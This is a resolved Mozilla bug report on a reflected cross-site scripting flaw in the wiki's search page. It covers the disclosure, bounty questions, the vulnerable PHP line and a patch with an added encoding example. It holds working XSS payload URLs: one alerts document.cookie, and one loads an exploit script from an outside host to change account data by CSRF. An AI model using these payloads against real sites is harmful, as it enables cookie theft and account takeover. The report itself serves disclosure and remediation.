Closed Bug 714540 Opened 10 years ago Closed 10 years ago

Cross site scripting (XSS) in https://wiki.mozilla.org

Categories: Websites :: wiki.mozilla.org, defect
Priority: Not set
Severity: critical
Tracking: Not tracked
Status: VERIFIED FIXED
People: Reporter: netfuzzerr, Assigned: wenzel
Details: Keywords: wsec-xss, Whiteboard: [infrasec:xss][ws:high]
Attachments: 2 files

User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7

Steps to reproduce:

Hello,

I found a Cross Site Scripting vulnerability in https://wiki.mozilla.org. The vulnerability results because the search is not correctly encoded, thus allowing an attacker to perform a Cross Site Scripting attack, and possibly compromising the account of a victim who visits a specially crafted link. To exploit it, the attacker must convince a logged-in user to visit the page with a specially created link exploiting this flaw, stealing the victim's cookies.

Reproduce:
1. Log in https://wiki.mozilla.org.
2. Now, go to https://wiki.mozilla.org/Special:Search?search=sssssssssssssss%22%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&x=23&y=8
3. See your cookies.

Is this vulnerability eligible for a reward?

Regards,
Mario
Severity: normal → critical
Thank you for reporting this issue to us. We'll investigate the issue and provide feedback within the bug. No additional action is needed from you at this time. If you have questions or additional information please add that info to the bug.

Thanks,
mgoodwin
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [infrasec:xss][ws:high]
Duplicate of this bug: 715042
Just to confirm a possible attack, I'm attaching an exploit for this vulnerability; it exploits the vulnerability and changes user information by doing a CSRF attack.

Reproduce:
1. Log in wiki.mozilla.org
2. Open this https://wiki.mozilla.org/Special:Search?search=%22%3E%3Cscript%20src=http://fuzzgooglecode.googlecode.com/files/xssexploit%282%29.js%3E%3C/script%3E
3. Wait...
4. See your account, changed.
Attached file Exploit demonstration.
I wonder if this vulnerability may be eligible for a reward?
It seems that Mozilla is ignoring this flaw; it's been two weeks, with no fix and no response. There is no reason to keep this flaw private. Mozilla is forcing me to make this flaw public. Will you not fix this flaw?
It seems the issue here is with the gmo skin.

The offending line is 353 of gmo.php:
                echo "&nbsp;&raquo;&nbsp;<a href=\"$item_url\"> Search: " . $search_params['search'] . "</a>";

Any user supplied input should be correctly output encoded prior to being written. See https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines#Preventing_XSS for more info.
Assignee: nobody → milos
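As an added illustration of the point in the comment above (this is not the actual patch from attachment 591185, and the variable names only follow the quoted line from gmo.php), the vulnerable breadcrumb line is shown beside an output-encoded form. The sample search string is constructed to resemble the reported one; the fix uses PHP's standard htmlspecialchars(), and encoding $item_url as well is an assumption about how the skin builds it, since that code is not on the page.

```php
<?php
// Added example, not the project's code: the unencoded breadcrumb from the gmo
// skin beside an HTML-encoded version.

// Constructed sample input shaped like the reported search parameter.
$search_params = ['search' => 'sssss"\'><script>alert(document.cookie)</script>'];
// Assumed: the skin builds the link URL from the same search term.
$item_url = 'https://wiki.mozilla.org/Special:Search?search='
          . rawurlencode($search_params['search']);

// Vulnerable: the raw search term is concatenated straight into HTML, so any
// markup in it is rendered by the browser.
function breadcrumb_vulnerable(string $item_url, array $search_params): string {
    return "&nbsp;&raquo;&nbsp;<a href=\"$item_url\"> Search: "
         . $search_params['search'] . "</a>";
}

// Hardened: every user-controlled value is HTML-encoded for the context it
// lands in. ENT_QUOTES covers both quote styles, which matters inside the
// href="..." attribute; the charset must match the page's encoding.
function breadcrumb_safe(string $item_url, array $search_params): string {
    $url  = htmlspecialchars($item_url, ENT_QUOTES, 'UTF-8');
    $term = htmlspecialchars($search_params['search'], ENT_QUOTES, 'UTF-8');
    return "&nbsp;&raquo;&nbsp;<a href=\"$url\"> Search: " . $term . "</a>";
}

echo "vulnerable: ", breadcrumb_vulnerable($item_url, $search_params), "\n";
echo "safe:       ", breadcrumb_safe($item_url, $search_params), "\n";
```

Run with `php` on the command line: the first line contains a literal `<script>` element, the second shows it as `&lt;script&gt;`, which the browser displays as text rather than executing. The same rule applies to every other place the skin echoes request data, not only this one line.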
(In reply to Mario Gomes from comment #5)
> I wonder if this vulnerability may be eligible for a reward?

Mario, this particular site is not on the bounty list and is not eligible for the bounty program.  The list of sites that do qualify can be found here : http://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs

However, we do still appreciate you filing this issue and we'll work to address it.
In the post about the bug bounty, Mozilla also said that it will also pay for security bugs in websites not listed. But it seems the bug needs to be "ws:critical". Is this right?
In the post, Mozilla also said that it will also pay for reports in sites not listed. But it seems it only pays for "ws:critical" bugs?
(In reply to Mario Gomes from comment #11)
> in the post, Mozilla also said that will pay also for reports in not listed.
> But, seems only pay for bugs "ws:critical"?

Correct, we sometimes pay bounties for exceptional security issues in other sites that were not listed within the bounty scope. WS:critical would be a minimum requirement, but would not guarantee a bounty payment. We would need to evaluate the specific issue on a case by case basis.
Okay. I will try to find it. Only one doubt: why does Mozilla here https://wiki.mozilla.org/WebAppSec/Web_App_Severity_Ratings rate CSRF more critical than XSS (reflected), if with an XSS I can do CSRF attacks (see comment 3)?

For example: bug 620397. The CSRF can change the user information, but if I have a reflected XSS I can do this easily (bypassing the security tokens).
Attached patch: Possible patch
This should fix the issue. Sadly, I don't have an instance of Mediawiki handy, so can someone try this out please?
Attachment #591185 - Flags: review?(milos)
Attachment #591185 - Flags: feedback?(nmaul)
Comment on attachment 591185: Possible patch

Review of attachment 591185:
-----------------------------------------------------------------

Looks good, thanks Fred.

Jake: please push this to prod, thanks.
Attachment #591185 - Flags: review?(milos) → review+
Landed: r100350. Will file a bug to get this pushed.
Assignee: milos → fwenzel
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Blocks: 720966
Thanks
Status: RESOLVED → VERIFIED
Attachment #591185 - Flags: feedback?(nmaul) → feedback+
Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.
Keywords: wsec-xss
Group: websites-security